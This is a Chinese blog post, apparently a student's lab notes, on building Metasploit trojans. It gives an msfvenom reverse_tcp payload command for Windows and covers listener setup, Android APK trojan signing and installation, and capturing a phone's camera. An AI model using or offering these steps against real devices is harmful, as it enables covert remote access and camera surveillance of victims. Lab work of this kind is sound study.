使用msf创建木马&使用脚本

0x01.Msfconsole

Msfconsole提供了一个一体化的集中控制台。通过msfconsole,可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。对于其中的大部分命令,可以输入help[COMMAND],进一步查看该命令的使用帮助信息。

0x02.Windows木马的生成

Windows木马生成流程如下:

格式为:msfvenom -p windows/meterpreter/reverse_tcp lhost=自己地址 lport=端口号 -f exe x>XX.exe
先查询一下攻击机的IP:

使用msf创建木马&使用脚本_第1张图片

则有下列的输入:

使用msf创建木马&使用脚本_第2张图片

将生成的木马放到目标Win10上去即可。因为只是实验,所以关闭了win10的防火墙和查杀软件,实际情况要复杂得多。

0x03.与Windows主机的“互动”

首先,在攻击机设置控制窗口:

使用msf创建木马&使用脚本_第3张图片

只等目标机click生成的木马软件。

进行一些简单的操作:

使用msf创建木马&使用脚本_第4张图片

使用msf创建木马&使用脚本_第5张图片

使用msf创建木马&使用脚本_第6张图片

0x04.与Windows主机的其他“互动”方式

参考:https://xz.aliyun.com/t/2536

使用msf创建木马&使用脚本_第7张图片

使用msf创建木马&使用脚本_第8张图片

使用msf创建木马&使用脚本_第9张图片

使用msf创建木马&使用脚本_第10张图片

使用msf创建木马&使用脚本_第11张图片

使用msf创建木马&使用脚本_第12张图片

使用msf创建木马&使用脚本_第13张图片

使用msf创建木马&使用脚本_第14张图片

使用msf创建木马&使用脚本_第15张图片

使用msf创建木马&使用脚本_第16张图片

使用msf创建木马&使用脚本_第17张图片

使用msf创建木马&使用脚本_第18张图片

使用msf创建木马&使用脚本_第19张图片

使用msf创建木马&使用脚本_第20张图片

使用msf创建木马&使用脚本_第21张图片

使用msf创建木马&使用脚本_第22张图片

使用msf创建木马&使用脚本_第23张图片

使用msf创建木马&使用脚本_第24张图片

使用msf创建木马&使用脚本_第25张图片

使用msf创建木马&使用脚本_第26张图片

使用msf创建木马&使用脚本_第27张图片

使用msf创建木马&使用脚本_第28张图片

使用msf创建木马&使用脚本_第29张图片

使用msf创建木马&使用脚本_第30张图片

使用msf创建木马&使用脚本_第31张图片

使用msf创建木马&使用脚本_第32张图片

0x04.生成Android木马并操作

使用msf创建木马&使用脚本_第33张图片

生成方式和之前的差不多,见下图:

使用msf创建木马&使用脚本_第34张图片

使用msf创建木马&使用脚本_第35张图片

发给手机后,可进行后续的操作。

借鉴:https://blog.csdn.net/u013990050/article/details/61618443

https://blog.csdn.net/qq_41502923/article/details/79151982

不能拿到安卓设备上去直接安装,我们还需要给apk文件签名
签名的话windwos上可以用apk逆向助手,android killer 。安卓上可以用MT文件管理器签名,都是一键化的。

签名完成后,用数据线将安卓设置和windows相连,在adb push,将木马推送上安卓设备上。

在安卓设置上我们用文件管理器来到sdcard目录下,可以看到apk.apk文件,我们点击安装这个软件,可以看到这个木马声请了很多权限:

使用msf创建木马&使用脚本_第36张图片

设置自己网络ip以及端口,手机点击病毒,即可抓取摄像头:

使用msf创建木马&使用脚本_第37张图片

获得截图后,保存在/root文件夹下

其中webscam_snap -i 1:外置摄像头 2:内置摄像头

0x05.总结

考试周,时间不充裕,导致windows的指令才试了几个,安卓的还没找到愿意做实验的对象(笑了哈哈哈)。继续努力!

你可能感兴趣的:(使用msf创建木马&使用脚本)